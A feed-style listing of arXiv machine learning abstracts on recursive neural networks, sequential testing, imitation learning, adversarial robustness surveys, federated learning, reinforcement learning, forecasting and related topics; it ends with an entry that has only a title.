    Beam Tree Recursive Neural Network (BT-RvNN) was recently proposed as a simple extension of Gumbel Tree RvNN and it was shown to achieve state-of-the-art length generalization performance in ListOps while maintaining comparable performance on other tasks. However, although not the worst in its kind, BT-RvNN can be still exorbitantly expensive in memory usage. In this paper, we identify the main bottleneck in BT-RvNN's memory usage to be the entanglement of the scorer function and the recursive cell function. We propose strategies to remove this bottleneck and further simplify its memory usage. Overall, our strategies not only reduce the memory usage of BT-RvNN by $10$-$16$ times but also create a new state-of-the-art in ListOps while maintaining similar performance in other tasks. In addition, we also propose a strategy to utilize the induced latent-tree node representations produced by BT-RvNN to turn BT-RvNN from a sentence encoder of the form $f:\mathbb{R}^{n \times d} \rightarrow \mathbb{R}^{d}$ into a sequence contextualizer of the form $f:\mathbb{R}^{n \times d} \rightarrow \mathbb{R}^{n \times d}$. Thus, our proposals not only open up a path for further scalability of RvNNs but also standardize a way to use BT-RvNNs as another building block in the deep learning toolkit that can be easily stacked or interfaced with other popular models such as Transformers and Structured State Space models.  ( 2 min )
    Sequential Predictive Two-Sample and Independence Testing. (arXiv:2305.00143v2 [stat.ML] UPDATED)
    We study the problems of sequential nonparametric two-sample and independence testing. Sequential tests process data online and allow using observed data to decide whether to stop and reject the null hypothesis or to collect more data, while maintaining type I error control. We build upon the principle of (nonparametric) testing by betting, where a gambler places bets on future observations and their wealth measures evidence against the null hypothesis. While recently developed kernel-based betting strategies often work well on simple distributions, selecting a suitable kernel for high-dimensional or structured data, such as images, is often nontrivial. To address this drawback, we design prediction-based betting strategies that rely on the following fact: if a sequentially updated predictor starts to consistently determine (a) which distribution an instance is drawn from, or (b) whether an instance is drawn from the joint distribution or the product of the marginal distributions (the latter produced by external randomization), it provides evidence against the two-sample or independence nulls respectively. We empirically demonstrate the superiority of our tests over kernel-based approaches under structured settings. Our tests can be applied beyond the case of independent and identically distributed data, remaining valid and powerful even when the data distribution drifts over time.  ( 2 min )
    On Combining Expert Demonstrations in Imitation Learning via Optimal Transport. (arXiv:2307.10810v1 [cs.LG])
    Imitation learning (IL) seeks to teach agents specific tasks through expert demonstrations. One of the key approaches to IL is to define a distance between agent and expert and to find an agent policy that minimizes that distance. Optimal transport methods have been widely used in imitation learning as they provide ways to measure meaningful distances between agent and expert trajectories. However, the problem of how to optimally combine multiple expert demonstrations has not been widely studied. The standard method is to simply concatenate state (-action) trajectories, which is problematic when trajectories are multi-modal. We propose an alternative method that uses a multi-marginal optimal transport distance and enables the combination of multiple and diverse state-trajectories in the OT sense, providing a more sensible geometric average of the demonstrations. Our approach enables an agent to learn from several experts, and its efficiency is analyzed on OpenAI Gym control environments and demonstrates that the standard method is not always optimal.  ( 2 min )
    It Is All About Data: A Survey on the Effects of Data on Adversarial Robustness. (arXiv:2303.09767v2 [cs.LG] UPDATED)
    Adversarial examples are inputs to machine learning models that an attacker has intentionally designed to confuse the model into making a mistake. Such examples pose a serious threat to the applicability of machine-learning-based systems, especially in life- and safety-critical domains. To address this problem, the area of adversarial robustness investigates mechanisms behind adversarial attacks and defenses against these attacks. This survey reviews a particular subset of this literature that focuses on investigating properties of training data in the context of model robustness under evasion attacks. It first summarizes the main properties of data leading to adversarial vulnerability. It then discusses guidelines and techniques for improving adversarial robustness by enhancing the data representation and learning procedures, as well as techniques for estimating robustness guarantees given particular data. Finally, it discusses gaps of knowledge and promising future research directions in this area.  ( 2 min )
    Syntactic vs Semantic Linear Abstraction and Refinement of Neural Networks. (arXiv:2307.10891v1 [cs.LO])
    Abstraction is a key verification technique to improve scalability. However, its use for neural networks is so far extremely limited. Previous approaches for abstracting classification networks replace several neurons with one of them that is similar enough. We can classify the similarity as defined either syntactically (using quantities on the connections between neurons) or semantically (on the activation values of neurons for various inputs). Unfortunately, the previous approaches only achieve moderate reductions, when implemented at all. In this work, we provide a more flexible framework where a neuron can be replaced with a linear combination of other neurons, improving the reduction. We apply this approach both on syntactic and semantic abstractions, and implement and evaluate them experimentally. Further, we introduce a refinement method for our abstractions, allowing for finding a better balance between reduction and precision.  ( 2 min )
    Pythae: Unifying Generative Autoencoders in Python -- A Benchmarking Use Case. (arXiv:2206.08309v2 [cs.LG] UPDATED)
    In recent years, deep generative models have attracted increasing interest due to their capacity to model complex distributions. Among those models, variational autoencoders have gained popularity as they have proven both to be computationally efficient and yield impressive results in multiple fields. Following this breakthrough, extensive research has been done in order to improve the original publication, resulting in a variety of different VAE models in response to different tasks. In this paper we present Pythae, a versatile open-source Python library providing both a unified implementation and a dedicated framework allowing straightforward, reproducible and reliable use of generative autoencoder models. We then propose to use this library to perform a case study benchmark where we present and compare 19 generative autoencoder models representative of some of the main improvements on downstream tasks such as image reconstruction, generation, classification, clustering and interpolation. The open-source library can be found at https://github.com/clementchadebec/benchmark_VAE.  ( 2 min )
    SAFARI: Versatile and Efficient Evaluations for Robustness of Interpretability. (arXiv:2208.09418v3 [cs.LG] UPDATED)
    Interpretability of Deep Learning (DL) is a barrier to trustworthy AI. Despite great efforts made by the Explainable AI (XAI) community, explanations lack robustness -- indistinguishable input perturbations may lead to different XAI results. Thus, it is vital to assess how robust DL interpretability is, given an XAI method. In this paper, we identify several challenges that the state-of-the-art is unable to cope with collectively: i) existing metrics are not comprehensive; ii) XAI techniques are highly heterogeneous; iii) misinterpretations are normally rare events. To tackle these challenges, we introduce two black-box evaluation methods, concerning the worst-case interpretation discrepancy and a probabilistic notion of how robust in general, respectively. Genetic Algorithm (GA) with bespoke fitness function is used to solve constrained optimisation for efficient worst-case evaluation. Subset Simulation (SS), dedicated to estimate rare event probabilities, is used for evaluating overall robustness. Experiments show that the accuracy, sensitivity, and efficiency of our methods outperform the state-of-the-arts. Finally, we demonstrate two applications of our methods: ranking robust XAI methods and selecting training schemes to improve both classification and interpretation robustness.  ( 2 min )
    Variational Mixture of HyperGenerators for Learning Distributions Over Functions. (arXiv:2302.06223v3 [cs.LG] UPDATED)
    Recent approaches build on implicit neural representations (INRs) to propose generative models over function spaces. However, they are computationally costly when dealing with inference tasks, such as missing data imputation, or directly cannot tackle them. In this work, we propose a novel deep generative model, named VAMoH. VAMoH combines the capabilities of modeling continuous functions using INRs and the inference capabilities of Variational Autoencoders (VAEs). In addition, VAMoH relies on a normalizing flow to define the prior, and a mixture of hypernetworks to parametrize the data log-likelihood. This gives VAMoH a high expressive capability and interpretability. Through experiments on a diverse range of data types, such as images, voxels, and climate data, we show that VAMoH can effectively learn rich distributions over continuous functions. Furthermore, it can perform inference-related tasks, such as conditional super-resolution generation and in-painting, as well or better than previous approaches, while being less computationally demanding.  ( 2 min )
    Efficient Action Robust Reinforcement Learning with Probabilistic Policy Execution Uncertainty. (arXiv:2307.07666v2 [cs.LG] UPDATED)
    Robust reinforcement learning (RL) aims to find a policy that optimizes the worst-case performance in the face of uncertainties. In this paper, we focus on action robust RL with the probabilistic policy execution uncertainty, in which, instead of always carrying out the action specified by the policy, the agent will take the action specified by the policy with probability $1-\rho$ and an alternative adversarial action with probability $\rho$. We establish the existence of an optimal policy on the action robust MDPs with probabilistic policy execution uncertainty and provide the action robust Bellman optimality equation for its solution. Furthermore, we develop Action Robust Reinforcement Learning with Certificates (ARRLC) algorithm that achieves minimax optimal regret and sample complexity. Furthermore, we conduct numerical experiments to validate our approach's robustness, demonstrating that ARRLC outperforms non-robust RL algorithms and converges faster than the robust TD algorithm in the presence of action perturbations.  ( 2 min )
    Spatial-Temporal Data Mining for Ocean Science: Data, Methodologies, and Opportunities. (arXiv:2307.10803v1 [cs.LG])
    With the increasing amount of spatial-temporal~(ST) ocean data, numerous spatial-temporal data mining (STDM) studies have been conducted to address various oceanic issues, e.g., climate forecasting and disaster warning. Compared with typical ST data (e.g., traffic data), ST ocean data is more complicated with some unique characteristics, e.g., diverse regionality and high sparsity. These characteristics make it difficult to design and train STDM models. Unfortunately, an overview of these studies is still missing, hindering computer scientists to identify the research issues in ocean while discouraging researchers in ocean science from applying advanced STDM techniques. To remedy this situation, we provide a comprehensive survey to summarize existing STDM studies in ocean. Concretely, we first summarize the widely-used ST ocean datasets and identify their unique characteristics. Then, typical ST ocean data quality enhancement techniques are discussed. Next, we classify existing STDM studies for ocean into four types of tasks, i.e., prediction, event detection, pattern mining, and anomaly detection, and elaborate the techniques for these tasks. Finally, promising research opportunities are highlighted. This survey will help scientists from the fields of both computer science and ocean science have a better understanding of the fundamental concepts, key techniques, and open challenges of STDM in ocean.  ( 3 min )
    Topological Point Cloud Clustering. (arXiv:2303.16716v2 [math.AT] UPDATED)
    We present Topological Point Cloud Clustering (TPCC), a new method to cluster points in an arbitrary point cloud based on their contribution to global topological features. TPCC synthesizes desirable features from spectral clustering and topological data analysis and is based on considering the spectral properties of a simplicial complex associated to the considered point cloud. As it is based on considering sparse eigenvector computations, TPCC is similarly easy to interpret and implement as spectral clustering. However, by focusing not just on a single matrix associated to a graph created from the point cloud data, but on a whole set of Hodge-Laplacians associated to an appropriately constructed simplicial complex, we can leverage a far richer set of topological features to characterize the data points within the point cloud and benefit from the relative robustness of topological techniques against noise. We test the performance of TPCC on both synthetic and real-world data and compare it with classical spectral clustering.  ( 2 min )
    Deep-Q Learning with Hybrid Quantum Neural Network on Solving Maze Problems. (arXiv:2304.10159v2 [quant-ph] UPDATED)
    Quantum computing holds great potential for advancing the limitations of machine learning algorithms to handle higher data dimensions and reduce overall training parameters in deep neural network (DNN) models. This study uses a parameterized quantum circuit (PQC) on a gate-based quantum computer to investigate the potential for quantum advantage in a model-free reinforcement learning problem. Through a comprehensive investigation and evaluation of the current model and capabilities of quantum computers, we designed and trained a novel hybrid Quantum neural network based on the latest Qiskit and PyTorch framework. We compared its performance with a full-classical DNN with and without an integrated PQC. Our research provides insights into the potential of deep quantum learning to solve a maze problem and, potentially, other reinforcement learning problems. We conclude that various reinforcement learning problems can be effective with reasonable training epochs. Moreover, a comparative discussion of the various quantum reinforcement learning model on maze problems is discussed to evaluate our research's overall potential and advantages.  ( 2 min )
    Quantitative CLTs in Deep Neural Networks. (arXiv:2307.06092v2 [cs.LG] UPDATED)
    We study the distribution of a fully connected neural network with random Gaussian weights and biases in which the hidden layer widths are proportional to a large constant $n$. Under mild assumptions on the non-linearity, we obtain quantitative bounds on normal approximations valid at large but finite $n$ and any fixed network depth. Our theorems show both for the finite-dimensional distributions and the entire process, that the distance between a random fully connected network (and its derivatives) to the corresponding infinite width Gaussian process scales like $n^{-\gamma}$ for $\gamma>0$, with the exponent depending on the metric used to measure discrepancy. Our bounds are strictly stronger in terms of their dependence on network width than any previously available in the literature; in the one-dimensional case, we also prove that they are optimal, i.e., we establish matching lower bounds.
    When are Local Queries Useful for Robust Learning?. (arXiv:2210.06089v2 [cs.LG] UPDATED)
    Distributional assumptions have been shown to be necessary for the robust learnability of concept classes when considering the exact-in-the-ball robust risk and access to random examples by Gourdeau et al. (2019). In this paper, we study learning models where the learner is given more power through the use of local queries, and give the first distribution-free algorithms that perform robust empirical risk minimization (ERM) for this notion of robustness. The first learning model we consider uses local membership queries (LMQ), where the learner can query the label of points near the training sample. We show that, under the uniform distribution, LMQs do not increase the robustness threshold of conjunctions and any superclass, e.g., decision lists and halfspaces. Faced with this negative result, we introduce the local equivalence query ($\mathsf{LEQ}$) oracle, which returns whether the hypothesis and target concept agree in the perturbation region around a point in the training sample, as well as a counterexample if it exists. We show a separation result: on the one hand, if the query radius $\lambda$ is strictly smaller than the adversary's perturbation budget $\rho$, then distribution-free robust learning is impossible for a wide variety of concept classes; on the other hand, the setting $\lambda=\rho$ allows us to develop robust ERM algorithms. We then bound the query complexity of these algorithms based on online learning guarantees and further improve these bounds for the special case of conjunctions. We finish by giving robust learning algorithms for halfspaces on $\{0,1\}^n$ and then obtaining robustness guarantees for halfspaces in $\mathbb{R}^n$ against precision-bounded adversaries.
    Perceptron Theory Can Predict the Accuracy of Neural Networks. (arXiv:2012.07881v2 [cs.LG] UPDATED)
    Multilayer neural networks set the current state of the art for many technical classification problems. But, these networks are still, essentially, black boxes in terms of analyzing them and predicting their performance. Here, we develop a statistical theory for the one-layer perceptron and show that it can predict performances of a surprisingly large variety of neural networks with different architectures. A general theory of classification with perceptrons is developed by generalizing an existing theory for analyzing reservoir computing models and connectionist models for symbolic reasoning known as vector symbolic architectures. Our statistical theory offers three formulas leveraging the signal statistics with increasing detail. The formulas are analytically intractable, but can be evaluated numerically. The description level that captures maximum details requires stochastic sampling methods. Depending on the network model, the simpler formulas already yield high prediction accuracy. The quality of the theory predictions is assessed in three experimental settings, a memorization task for echo state networks (ESNs) from reservoir computing literature, a collection of classification datasets for shallow randomly connected networks, and the ImageNet dataset for deep convolutional neural networks. We find that the second description level of the perceptron theory can predict the performance of types of ESNs, which could not be described previously. The theory can predict deep multilayer neural networks by being applied to their output layer. While other methods for prediction of neural networks performance commonly require to train an estimator model, the proposed theory requires only the first two moments of the distribution of the postsynaptic sums in the output neurons. The perceptron theory compares favorably to other methods that do not rely on training an estimator model.  ( 3 min )
    Data-Driven Latency Probability Prediction for Wireless Networks: Focusing on Tail Probabilities. (arXiv:2307.10648v1 [cs.NI])
    With the emergence of new application areas, such as cyber-physical systems and human-in-the-loop applications, there is a need to guarantee a certain level of end-to-end network latency with extremely high reliability, e.g., 99.999%. While mechanisms specified under IEEE 802.1as time-sensitive networking (TSN) can be used to achieve these requirements for switched Ethernet networks, implementing TSN mechanisms in wireless networks is challenging due to their stochastic nature. To conform the wireless link to a reliability level of 99.999%, the behavior of extremely rare outliers in the latency probability distribution, or the tail of the distribution, must be analyzed and controlled. This work proposes predicting the tail of the latency distribution using state-of-the-art data-driven approaches, such as mixture density networks (MDN) and extreme value mixture models, to estimate the likelihood of rare latencies conditioned on the network parameters, which can be used to make more informed decisions in wireless transmission. Actual latency measurements of IEEE 802.11g (WiFi), commercial private and a software-defined 5G network are used to benchmark the proposed approaches and evaluate their sensitivities concerning the tail probabilities.
    Injecting Domain Adaptation with Learning-to-hash for Effective and Efficient Zero-shot Dense Retrieval. (arXiv:2205.11498v2 [cs.IR] UPDATED)
    Dense retrieval overcome the lexical gap and has shown great success in ad-hoc information retrieval (IR). Despite their success, dense retrievers are expensive to serve across practical use cases. For use cases requiring to search from millions of documents, the dense index becomes bulky and requires high memory usage for storing the index. More recently, learning-to-hash (LTH) techniques, for e.g., BPR and JPQ, produce binary document vectors, thereby reducing the memory requirement to efficiently store the dense index. LTH techniques are supervised and finetune the retriever using a ranking loss. They outperform their counterparts, i.e., traditional out-of-the-box vector compression techniques such as PCA or PQ. A missing piece from prior work is that existing techniques have been evaluated only in-domain, i.e., on a single dataset such as MS MARCO. In our work, we evaluate LTH and vector compression techniques for improving the downstream zero-shot retrieval accuracy of the TAS-B dense retriever while maintaining efficiency at inference. Our results demonstrate that, unlike prior work, LTH strategies when applied naively can underperform the zero-shot TAS-B dense retriever on average by up to 14% nDCG@10 on the BEIR benchmark. To solve this limitation, in our work, we propose an easy yet effective solution of injecting domain adaptation with existing supervised LTH techniques. We experiment with two well-known unsupervised domain adaptation techniques: GenQ and GPL. Our domain adaptation injection technique can improve the downstream zero-shot retrieval effectiveness for both BPR and JPQ variants of the TAS-B model by on average 11.5% and 8.2% nDCG@10 while both maintaining 32$\times$ memory efficiency and 14$\times$ and 2$\times$ speedup respectively in CPU retrieval latency on BEIR. All our code, models, and data are publicly available at https://github.com/thakur-nandan/income.
    Positive unlabeled learning with tensor networks. (arXiv:2211.14085v3 [cs.LG] UPDATED)
    Positive unlabeled learning is a binary classification problem with positive and unlabeled data. It is common in domains where negative labels are costly or impossible to obtain, e.g., medicine and personalized advertising. Most approaches to positive unlabeled learning apply to specific data types (e.g., images, categorical data) and can not generate new positive and negative samples. This work introduces a feature-space distance-based tensor network approach to the positive unlabeled learning problem. The presented method is not domain specific and significantly improves the state-of-the-art results on the MNIST image and 15 categorical/mixed datasets. The trained tensor network model is also a generative model and enables the generation of new positive and negative instances.
    Chordal Averaging on Flag Manifolds and Its Applications. (arXiv:2303.13501v2 [cs.CV] UPDATED)
    This paper presents a new, provably-convergent algorithm for computing the flag-mean and flag-median of a set of points on a flag manifold under the chordal metric. The flag manifold is a mathematical space consisting of flags, which are sequences of nested subspaces of a vector space that increase in dimension. The flag manifold is a superset of a wide range of known matrix spaces, including Stiefel and Grassmanians, making it a general object that is useful in a wide variety computer vision problems. To tackle the challenge of computing first order flag statistics, we first transform the problem into one that involves auxiliary variables constrained to the Stiefel manifold. The Stiefel manifold is a space of orthogonal frames, and leveraging the numerical stability and efficiency of Stiefel-manifold optimization enables us to compute the flag-mean effectively. Through a series of experiments, we show the competence of our method in Grassmann and rotation averaging, as well as principal component analysis. We release our source code under https://github.com/nmank/FlagAveraging.  ( 2 min )
    A Survey of What to Share in Federated Learning: Perspectives on Model Utility, Privacy Leakage, and Communication Efficiency. (arXiv:2307.10655v1 [cs.LG])
    Federated learning (FL) has emerged as a highly effective paradigm for privacy-preserving collaborative training among different parties. Unlike traditional centralized learning, which requires collecting data from each party, FL allows clients to share privacy-preserving information without exposing private datasets. This approach not only guarantees enhanced privacy protection but also facilitates more efficient and secure collaboration among multiple participants. Therefore, FL has gained considerable attention from researchers, promoting numerous surveys to summarize the related works. However, the majority of these surveys concentrate on methods sharing model parameters during the training process, while overlooking the potential of sharing other forms of local information. In this paper, we present a systematic survey from a new perspective, i.e., what to share in FL, with an emphasis on the model utility, privacy leakage, and communication efficiency. This survey differs from previous ones due to four distinct contributions. First, we present a new taxonomy of FL methods in terms of the sharing methods, which includes three categories of shared information: model sharing, synthetic data sharing, and knowledge sharing. Second, we analyze the vulnerability of different sharing methods to privacy attacks and review the defense mechanisms that provide certain privacy guarantees. Third, we conduct extensive experiments to compare the performance and communication overhead of various sharing methods in FL. Besides, we assess the potential privacy leakage through model inversion and membership inference attacks, while comparing the effectiveness of various defense approaches. Finally, we discuss potential deficiencies in current methods and outline future directions for improvement.
    Curiosity in Hindsight: Intrinsic Exploration in Stochastic Environments. (arXiv:2211.10515v2 [stat.ML] UPDATED)
    Consider the problem of exploration in sparse-reward or reward-free environments, such as in Montezuma's Revenge. In the curiosity-driven paradigm, the agent is rewarded for how much each realized outcome differs from their predicted outcome. But using predictive error as intrinsic motivation is fragile in stochastic environments, as the agent may become trapped by high-entropy areas of the state-action space, such as a "noisy TV". In this work, we study a natural solution derived from structural causal models of the world: Our key idea is to learn representations of the future that capture precisely the unpredictable aspects of each outcome -- which we use as additional input for predictions, such that intrinsic rewards only reflect the predictable aspects of world dynamics. First, we propose incorporating such hindsight representations into models to disentangle "noise" from "novelty", yielding Curiosity in Hindsight: a simple and scalable generalization of curiosity that is robust to stochasticity. Second, we instantiate this framework for the recently introduced BYOL-Explore algorithm as our prime example, resulting in the noise-robust BYOL-Hindsight. Third, we illustrate its behavior under a variety of different stochasticities in a grid world, and find improvements over BYOL-Explore in hard-exploration Atari games with sticky actions. Notably, we show state-of-the-art results in exploring Montezuma's Revenge with sticky actions, while preserving performance in the non-sticky setting.
    Intelligent model for offshore China sea fog forecasting. (arXiv:2307.10580v1 [cs.LG])
    Accurate and timely prediction of sea fog is very important for effectively managing maritime and coastal economic activities. Given the intricate nature and inherent variability of sea fog, traditional numerical and statistical forecasting methods are often proven inadequate. This study aims to develop an advanced sea fog forecasting method embedded in a numerical weather prediction model using the Yangtze River Estuary (YRE) coastal area as a case study. Prior to training our machine learning model, we employ a time-lagged correlation analysis technique to identify key predictors and decipher the underlying mechanisms driving sea fog occurrence. In addition, we implement ensemble learning and a focal loss function to address the issue of imbalanced data, thereby enhancing the predictive ability of our model. To verify the accuracy of our method, we evaluate its performance using a comprehensive dataset spanning one year, which encompasses both weather station observations and historical forecasts. Remarkably, our machine learning-based approach surpasses the predictive performance of two conventional methods, the weather research and forecasting nonhydrostatic mesoscale model (WRF-NMM) and the algorithm developed by the National Oceanic and Atmospheric Administration (NOAA) Forecast Systems Laboratory (FSL). Specifically, in regard to predicting sea fog with a visibility of less than or equal to 1 km with a lead time of 60 hours, our methodology achieves superior results by increasing the probability of detection (POD) while simultaneously reducing the false alarm ratio (FAR).
    MetaMask: Revisiting Dimensional Confounder for Self-Supervised Learning. (arXiv:2209.07902v4 [cs.LG] UPDATED)
    As a successful approach to self-supervised learning, contrastive learning aims to learn invariant information shared among distortions of the input sample. While contrastive learning has yielded continuous advancements in sampling strategy and architecture design, it still remains two persistent defects: the interference of task-irrelevant information and sample inefficiency, which are related to the recurring existence of trivial constant solutions. From the perspective of dimensional analysis, we find out that the dimensional redundancy and dimensional confounder are the intrinsic issues behind the phenomena, and provide experimental evidence to support our viewpoint. We further propose a simple yet effective approach MetaMask, short for the dimensional Mask learned by Meta-learning, to learn representations against dimensional redundancy and confounder. MetaMask adopts the redundancy-reduction technique to tackle the dimensional redundancy issue and innovatively introduces a dimensional mask to reduce the gradient effects of specific dimensions containing the confounder, which is trained by employing a meta-learning paradigm with the objective of improving the performance of masked representations on a typical self-supervised task. We provide solid theoretical analyses to prove MetaMask can obtain tighter risk bounds for downstream classification compared to typical contrastive methods. Empirically, our method achieves state-of-the-art performance on various benchmarks.
    Can point cloud networks learn statistical shape models of anatomies?. (arXiv:2305.05610v2 [cs.CV] UPDATED)
    Statistical Shape Modeling (SSM) is a valuable tool for investigating and quantifying anatomical variations within populations of anatomies. However, traditional correspondence-based SSM generation methods have a prohibitive inference process and require complete geometric proxies (e.g., high-resolution binary volumes or surface meshes) as input shapes to construct the SSM. Unordered 3D point cloud representations of shapes are more easily acquired from various medical imaging practices (e.g., thresholded images and surface scanning). Point cloud deep networks have recently achieved remarkable success in learning permutation-invariant features for different point cloud tasks (e.g., completion, semantic segmentation, classification). However, their application to learning SSM from point clouds is to-date unexplored. In this work, we demonstrate that existing point cloud encoder-decoder-based completion networks can provide an untapped potential for SSM, capturing population-level statistical representations of shapes while reducing the inference burden and relaxing the input requirement. We discuss the limitations of these techniques to the SSM application and suggest future improvements. Our work paves the way for further exploration of point cloud deep learning for SSM, a promising avenue for advancing shape analysis literature and broadening SSM to diverse use cases.
    From Graph Generation to Graph Classification. (arXiv:2302.07989v2 [cs.LG] UPDATED)
    This note describes a new approach to classifying graphs that leverages graph generative models (GGM). Assuming a GGM that defines a joint probability distribution over graphs and their class labels, I derive classification formulas for the probability of a class label given a graph. A new conditional ELBO can be used to train a generative graph auto-encoder model for discrimination. While leveraging generative models for classification has been well explored for non-relational i.i.d. data, to our knowledge it is a novel approach to graph classification.
    PGCN: Progressive Graph Convolutional Networks for Spatial-Temporal Traffic Forecasting. (arXiv:2202.08982v2 [cs.LG] UPDATED)
    The complex spatial-temporal correlations in transportation networks make the traffic forecasting problem challenging. Since transportation system inherently possesses graph structures, much research efforts have been put with graph neural networks. Recently, constructing adaptive graphs to the data has shown promising results over the models relying on a single static graph structure. However, the graph adaptations are applied during the training phases, and do not reflect the data used during the testing phases. Such shortcomings can be problematic especially in traffic forecasting since the traffic data often suffers from the unexpected changes and irregularities in the time series. In this study, we propose a novel traffic forecasting framework called Progressive Graph Convolutional Network (PGCN). PGCN constructs a set of graphs by progressively adapting to input data during the training and the testing phases. Specifically, we implemented the model to construct progressive adjacency matrices by learning trend similarities among graph nodes. Then, the model is combined with the dilated causal convolution and gated activation unit to extract temporal features. With residual and skip connections, PGCN performs the traffic prediction. When applied to four real-world traffic datasets of diverse geometric nature, the proposed model achieves state-of-the-art performance with consistency in all datasets. We conclude that the ability of PGCN to progressively adapt to input data enables the model to generalize in different study sites with robustness.
    Conditional expectation network for SHAP. (arXiv:2307.10654v1 [cs.LG])
    A very popular model-agnostic technique for explaining predictive models is the SHapley Additive exPlanation (SHAP). The two most popular versions of SHAP are a conditional expectation version and an unconditional expectation version (the latter is also known as interventional SHAP). Except for tree-based methods, usually the unconditional version is used (for computational reasons). We provide a (surrogate) neural network approach which allows us to efficiently calculate the conditional version for both neural networks and other regression models, and which properly considers the dependence structure in the feature components. This proposal is also useful to provide drop1 and anova analyses in complex regression models which are similar to their generalized linear model (GLM) counterparts, and we provide a partial dependence plot (PDP) counterpart that considers the right dependence structure in the feature components.
    Optimizing PatchCore for Few/many-shot Anomaly Detection. (arXiv:2307.10792v1 [cs.CV])
    Few-shot anomaly detection (AD) is an emerging sub-field of general AD, and tries to distinguish between normal and anomalous data using only few selected samples. While newly proposed few-shot AD methods do compare against pre-existing algorithms developed for the full-shot domain as baselines, they do not dedicatedly optimize them for the few-shot setting. It thus remains unclear if the performance of such pre-existing algorithms can be further improved. We address said question in this work. Specifically, we present a study on the AD/anomaly segmentation (AS) performance of PatchCore, the current state-of-the-art full-shot AD/AS algorithm, in both the few-shot and the many-shot settings. We hypothesize that further performance improvements can be realized by (I) optimizing its various hyperparameters, and by (II) transferring techniques known to improve few-shot supervised learning to the AD domain. Exhaustive experiments on the public VisA and MVTec AD datasets reveal that (I) significant performance improvements can be realized by optimizing hyperparameters such as the underlying feature extractor, and that (II) image-level augmentations can, but are not guaranteed, to improve performance. Based on these findings, we achieve a new state of the art in few-shot AD on VisA, further demonstrating the merit of adapting pre-existing AD/AS methods to the few-shot setting. Last, we identify the investigation of feature extractors with a strong inductive bias as a potential future research direction for (few-shot) AD/AS.
    Leveraging Offline Data in Online Reinforcement Learning. (arXiv:2211.04974v2 [cs.LG] UPDATED)
    Two central paradigms have emerged in the reinforcement learning (RL) community: online RL and offline RL. In the online RL setting, the agent has no prior knowledge of the environment, and must interact with it in order to find an $\epsilon$-optimal policy. In the offline RL setting, the learner instead has access to a fixed dataset to learn from, but is unable to otherwise interact with the environment, and must obtain the best policy it can from this offline data. Practical scenarios often motivate an intermediate setting: if we have some set of offline data and, in addition, may also interact with the environment, how can we best use the offline data to minimize the number of online interactions necessary to learn an $\epsilon$-optimal policy? In this work, we consider this setting, which we call the \textsf{FineTuneRL} setting, for MDPs with linear structure. We characterize the necessary number of online samples needed in this setting given access to some offline dataset, and develop an algorithm, \textsc{FTPedel}, which is provably optimal, up to $H$ factors. We show through an explicit example that combining offline data with online interactions can lead to a provable improvement over either purely offline or purely online RL. Finally, our results illustrate the distinction between \emph{verifiable} learning, the typical setting considered in online RL, and \emph{unverifiable} learning, the setting often considered in offline RL, and show that there is a formal separation between these regimes.
    A DPLL(T) Framework for Verifying Deep Neural Networks. (arXiv:2307.10266v1 [cs.LG])
    Deep Neural Networks (DNNs) have emerged as an effective approach to tackling real-world problems. However, like human-written software, automatically-generated DNNs can have bugs and be attacked. This thus attracts many recent interests in developing effective and scalable DNN verification techniques and tools. In this work, we introduce a NeuralSAT, a new constraint solving approach to DNN verification. The design of NeuralSAT follows the DPLL(T) algorithm used modern SMT solving, which includes (conflict) clause learning, abstraction, and theory solving, and thus NeuralSAT can be considered as an SMT framework for DNNs. Preliminary results show that the NeuralSAT prototype is competitive to the state-of-the-art. We hope, with proper optimization and engineering, NeuralSAT will carry the power and success of modern SAT/SMT solvers to DNN verification. NeuralSAT is avaliable from: https://github.com/dynaroars/neuralsat-solver
    Tuning Stochastic Gradient Algorithms for Statistical Inference via Large-Sample Asymptotics. (arXiv:2207.12395v3 [stat.CO] UPDATED)
    The tuning of stochastic gradient algorithms (SGAs) for optimization and sampling is often based on heuristics and trial-and-error rather than generalizable theory. We address this theory--practice gap by characterizing the large-sample statistical asymptotics of SGAs via a joint step-size--sample-size scaling limit. We show that iterate averaging with a large fixed step size is robust to the choice of tuning parameters and asymptotically has covariance proportional to that of the MLE sampling distribution. We also prove a Bernstein--von Mises-like theorem to guide tuning, including for generalized posteriors that are robust to model misspecification. Numerical experiments validate our results and recommendations in realistic finite-sample regimes. Our work lays the foundation for a systematic analysis of other stochastic gradient Markov chain Monte Carlo algorithms for a wide range of models.
    Blockchain-Based Federated Learning: Incentivizing Data Sharing and Penalizing Dishonest Behavior. (arXiv:2307.10492v1 [cs.LG])
    With the increasing importance of data sharing for collaboration and innovation, it is becoming more important to ensure that data is managed and shared in a secure and trustworthy manner. Data governance is a common approach to managing data, but it faces many challenges such as data silos, data consistency, privacy, security, and access control. To address these challenges, this paper proposes a comprehensive framework that integrates data trust in federated learning with InterPlanetary File System, blockchain, and smart contracts to facilitate secure and mutually beneficial data sharing while providing incentives, access control mechanisms, and penalizing any dishonest behavior. The experimental results demonstrate that the proposed model is effective in improving the accuracy of federated learning models while ensuring the security and fairness of the data-sharing process. The research paper also presents a decentralized federated learning platform that successfully trained a CNN model on the MNIST dataset using blockchain technology. The platform enables multiple workers to train the model simultaneously while maintaining data privacy and security. The decentralized architecture and use of blockchain technology allow for efficient communication and coordination between workers. This platform has the potential to facilitate decentralized machine learning and support privacy-preserving collaboration in various domains.
    Zero-shot Domain-sensitive Speech Recognition with Prompt-conditioning Fine-tuning. (arXiv:2307.10274v1 [eess.AS])
    In this work, we propose a method to create domain-sensitive speech recognition models that utilize textual domain information by conditioning its generation on a given text prompt. This is accomplished by fine-tuning a pre-trained, end-to-end model (Whisper) to learn from demonstrations with prompt examples. We show that this ability can be generalized to different domains and even various prompt contexts, with our model gaining a Word Error Rate (WER) reduction of up to 33% on unseen datasets from various domains, such as medical conversation, air traffic control communication, and financial meetings. Considering the limited availability of audio-transcript pair data, we further extend our method to text-only fine-tuning to achieve domain sensitivity as well as domain adaptation. We demonstrate that our text-only fine-tuned model can also attend to various prompt contexts, with the model reaching the most WER reduction of 29% on the medical conversation dataset.
    IncDSI: Incrementally Updatable Document Retrieval. (arXiv:2307.10323v1 [cs.IR])
